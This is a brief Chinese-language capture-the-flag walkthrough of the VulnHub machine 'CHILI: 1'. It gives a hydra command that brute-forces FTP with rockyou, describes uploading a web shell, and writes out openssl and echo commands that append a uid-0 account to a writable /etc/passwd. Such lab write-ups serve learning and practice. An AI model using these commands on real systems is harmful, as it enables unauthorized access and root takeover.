VulnHub靶场之CHILI: 1

扫描IP以及端口：

访问80端口，一个小辣椒，目录扫描，啥都没有，只能从ftp下手了：

看了看hint，用chili当作用户名试试破解一下密码：

利用hydra破解ftp密码：

hydra -l chili -P /usr/share/wordlists/rockyou.txt -f -V ftp://192.168.198.150

得到密码：

成功进入：

进入到/var/www/html下，.nano下可读可写：

上传shell文件，别忘了加权限chmod 777：

访问，监听：

就一个用户chili，，，内核也较新：

发现passwd可以写入：

直接利用kali的工具openssl：

openssl passwd -1 -salt shell 123

写入到passwd：

echo 'shell:$1$shell$5TvJA7y/9faSDWR84IKgZ/:0:0::/root:/bin/bash'>>/etc/passwd

成功获取root权限，读取flag：